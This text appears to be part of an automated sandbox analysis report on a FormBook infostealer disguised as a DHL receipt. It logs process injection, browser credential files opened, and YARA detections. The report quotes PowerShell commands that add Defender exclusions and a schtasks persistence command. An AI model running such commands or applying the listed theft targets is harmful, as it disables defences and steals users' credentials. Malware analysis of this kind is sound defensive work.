                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread register set: target process: 7620
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread APC queued: target process: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6FD008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AD1008Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687461556.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000000.2400830514.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000000.2559733028.0000000000FF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687461556.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000000.2400830514.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000000.2559733028.0000000000FF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687461556.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000000.2400830514.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000000.2559733028.0000000000FF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687461556.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000000.2400830514.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000000.2559733028.0000000000FF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeQueries volume information: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4688006537.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2481904165.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
